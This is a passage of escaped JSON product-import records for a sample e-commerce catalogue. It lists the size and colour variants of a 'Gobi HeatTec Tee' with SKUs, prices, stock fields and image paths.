ms04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"391\":{\"sku\":\"MS04-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-M-Orange\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"392\":{\"sku\":\"MS04-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-M-Red\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"393\":{\"sku\":\"MS04-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-L-Black\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"394\":{\"sku\":\"MS04-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-L-Orange\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"395\":{\"sku\":\"MS04-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-L-Red\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"396\":{\"sku\":\"MS04-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-XL-Black\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"397\":{\"sku\":\"MS04-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-XL-Orange\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"398\":{\"sku\":\"MS04-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee-XL-Red\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gobi-heattec-reg-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"399\":{\"sku\":\"MS04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Gobi HeatTec&reg; Tee\",\"description\":\"<p>When the training gets intense, the Gobi HeatTec&reg; Tee works as hard as you do to maintain your cool. The moisture-wicking material promises drier comfort, while breathable side panels deliver extra stretch that\'s sure to keep you moving.<\\/p>\\n<p>&bull; Orange micropolyester shirt.<br \\/>&bull; HeatTec&reg; wicking fabric.<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cotton|HeatTec&reg;|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS04-XS-Black,size=XS,colo